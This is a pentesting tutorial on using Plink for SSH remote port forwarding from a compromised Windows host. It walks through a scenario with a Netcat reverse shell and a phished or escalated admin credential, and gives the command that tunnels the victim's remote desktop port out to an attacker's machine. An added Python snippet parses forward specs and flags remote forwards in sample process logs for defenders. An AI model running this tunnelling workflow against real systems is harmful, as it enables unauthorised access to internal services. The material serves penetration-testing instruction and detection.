Local port forwarding is great when you want to use SSH to pivot into a non-routable network. But if you want to reach services on a network where you can't configure port forwarding on the router and also don't have VPN access, remote port forwarding is the way to go.
Remote port forwarding excels in situations where you want access to a service on an internal network and have gained control of a machine on that network via a reverse shell of some kind. Whether you're a pentester or a system admin, this is a great thing to know about.
For example, let's say you compromise a public terminal in the local library and get some credentials. You install a persistent reverse shell of some sort, which communicates back to your machine, but you don't have access to some of the other services on the machine. The victim machine might have an SQL instance configured on localhost only that you want to reach, or maybe you want to access the remote desktop. Maybe the network is hosting some sort of admin panel you'd like to poke around in. Whatever it is you want, a compromised host and SSH will get you in.
Remote port forwarding isn't only for malicious scenarios. You can use it to punch a temporary hole out of a network to use work services at home, though that may be frowned upon by your security team.
Another excellent use is in phishing campaigns where a user has executed your payload and you only have a reverse shell connection back. After a bit of information gathering and then privilege escalation, you gather the credentials for the administrative user and wish to use those on another service on the compromised machine.
In this article, we'll be using SSH to access the remote desktop on a host located behind a firewall in an internal network — all without modifying the port forwarding rules on the gateway!
The shell is a Netcat connection running cmd.exe. The user "bob" is not a privileged user. Through prior information gathering, I know that the user "barrow" is a privileged user, and I also know that this machine has a remote desktop service available.
It would be excellent to log into this machine via remote desktop as an administrative user, but it is non-routable from my machine. Our compromised machine is behind a router, with an internal IP address, and I don't have access to the internal network except via the compromised host itself.
I can use the reverse shell to interact with the compromised host, but if I attempt to connect to its remote desktop, the internal IP address is unreachable from my side. If I use the public-facing IP address, I'll be connecting to a router, which will just drop my packets. Since I don't have an SSH server on this network that I can pivot with, I'll have to use Plink to forward the remote desktop service to my attacking machine.
Step 1: Install Plink
Plink is a Windows command line SSH client. It is included with Kali Linux in the /usr/share/windows-binaries/ directory. It can also be downloaded from the developer (look for the plink.exe file).
Step 2: Set Up the Remote Port Forward
Using my Netcat shell and plink.exe, I set up a remote port forward from my victim machine to my attacking machine by typing the following into the reverse shell I have established from the victim machine.
plink attackingMachine -R 4000:127.0.0.1:3389
The syntax is similar to SSH. The -R option tells Plink to connect to the attacking machine and bind a listener there on port 4000 (I arbitrarily selected port 4000 — you can select any port). The portion after the first colon defines which service is served to port 4000 on the attacking machine: in this case, the victim machine's port 3389. Once this command is entered, I log in with my credentials to my attacking machine. Now my attacking machine has access to the remote desktop service on the victim machine via localhost port 4000.
If you're paying attention, you may have noticed that I used the localhost address on the victim machine. This is useful for forwarding services that are constrained to localhost access only, such as MySQL.
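To make the -R syntax concrete from the defender's side, here is an added example (not code from the article or from the Plink project) that parses OpenSSH/Plink forwarding specs and then scans constructed process-creation log lines for remote forwards. It goes a little beyond the article's single command: it handles both -R and -L, the optional bind address, and the compact -R4000:... form. The log lines, host names (WS-07, DEV-02, jumphost, vps.example, intranet) and users are all made up for the demo; attackingMachine is the placeholder from the article.

```python
"""Parse SSH/Plink port-forward specs and flag remote (-R) forwards in process logs.

Added example for this article, not code from the original post or from Plink.
Forward-spec grammar (shared by OpenSSH and Plink):
  -R [bind_address:]port:host:hostport   listener opens on the SSH *server* side
  -L [bind_address:]port:host:hostport   listener opens on the SSH *client* side
The log lines in SAMPLE_LOG are constructed for the demo, not real telemetry.
"""
import re
import shlex
from dataclasses import dataclass


@dataclass
class Forward:
    kind: str          # "remote" (-R) or "local" (-L)
    bind_address: str  # explicit bind interface, "" when omitted
    listen_port: int
    target_host: str   # where the listener's traffic is delivered
    target_port: int

    def listener_side(self) -> str:
        # -R opens the listener where the SSH server runs (the attacking box in the
        # article); -L opens it where the SSH client runs.
        return "ssh-server" if self.kind == "remote" else "ssh-client"


def parse_forward_spec(flag: str, spec: str) -> Forward:
    """Turn '-R' + '4000:127.0.0.1:3389' into a Forward record."""
    parts = spec.split(":")
    if len(parts) == 3:
        bind, port, host, hostport = "", *parts
    elif len(parts) == 4:
        bind, port, host, hostport = parts
    else:
        raise ValueError(f"unsupported forward spec: {spec!r}")
    kind = {"-R": "remote", "-L": "local"}[flag]
    return Forward(kind, bind, int(port), host, int(hostport))


def forwards_in_command(cmdline: str) -> list[Forward]:
    """Extract every -R/-L forward from an ssh/plink command line."""
    argv = shlex.split(cmdline, posix=False)  # keep Windows backslashes intact
    found = []
    i = 0
    while i < len(argv):
        tok = argv[i]
        if tok in ("-R", "-L") and i + 1 < len(argv):      # "-R 4000:127.0.0.1:3389"
            found.append(parse_forward_spec(tok, argv[i + 1]))
            i += 2
        elif tok[:2] in ("-R", "-L") and ":" in tok:        # "-R4000:127.0.0.1:3389"
            found.append(parse_forward_spec(tok[:2], tok[2:]))
            i += 1
        else:
            i += 1
    return found


# Constructed process-creation log lines (one process per line), not real data.
SAMPLE_LOG = """\
2024-05-01T10:02:11Z host=WS-07 user=bob image=C:\\Users\\bob\\plink.exe cmd="plink attackingMachine -R 4000:127.0.0.1:3389"
2024-05-01T10:05:42Z host=WS-07 user=bob image=C:\\Windows\\System32\\notepad.exe cmd="notepad.exe notes.txt"
2024-05-01T10:09:03Z host=DEV-02 user=alice image=C:\\Windows\\System32\\OpenSSH\\ssh.exe cmd="ssh -L 8080:intranet:80 jumphost"
2024-05-01T10:11:30Z host=DEV-02 user=alice image=C:\\Windows\\System32\\OpenSSH\\ssh.exe cmd="ssh -R 0.0.0.0:2222:localhost:22 vps.example"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) image=\S+ cmd="(?P<cmd>[^"]*)"$'
)

LOOPBACK = ("127.0.0.1", "localhost", "::1")


def find_remote_forwards(log_text: str) -> list[dict]:
    """One finding per -R forward: who opened it and which local service it pushes out."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        for fwd in forwards_in_command(m["cmd"]):
            if fwd.kind != "remote":
                continue  # -L pulls a service inward; only -R exposes a local service outward
            findings.append({
                "host": m["host"],
                "user": m["user"],
                "exposes": f"{fwd.target_host}:{fwd.target_port}",
                # Without an explicit bind address OpenSSH binds the -R listener to
                # loopback on the server (GatewayPorts controls anything wider).
                "listener": f"{fwd.bind_address or '127.0.0.1'}:{fwd.listen_port} on {fwd.listener_side()}",
                "loopback_only_service": fwd.target_host in LOOPBACK,
            })
    return findings


if __name__ == "__main__":
    for f in find_remote_forwards(SAMPLE_LOG):
        print(f)
```

The `loopback_only_service` flag is the point the article makes about localhost-bound services: a -R whose target is 127.0.0.1 is carrying something the host never meant to expose off-box, which is exactly the kind of command line worth alerting on in process-creation telemetry.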
Step 3: Log into a Remote Desktop
With that running in my Netcat shell, I connect to my victim machine's remote desktop service using the rdesktop command, pointing it at localhost port 4000, where the tunnel delivers traffic to the victim machine's local port 3389.
All that's left to do is use a known credential to log into Windows, either phished or gained via privilege escalation. From here, I have full administrative access to the system, despite the system's gateway dropping all inbound connection requests. I also retained my initial shell connection, which is always important to me. Shells can be a lot easier to lose than they are to get back.
SSH is an excellent tool for pivoting in networks, but it's not limited to penetration testing. Remote port forwarding can give you access to services on a machine that might normally be inaccessible. It can be useful if you want to share your services with networks that normally might not be able to reach them. For example, you might need to temporarily connect to a service at work from home while the firewall is dropping all inbound packets. In some cases, setting up a reverse SSH tunnel is easier than configuring port forwarding on a consumer-grade router.
If you have any questions or comments, feel free to post. You can also reach me on Twitter @0xBarrow. And as always, follow Null Byte on social media to stay up to date on all of the greatest hacking guides on the web.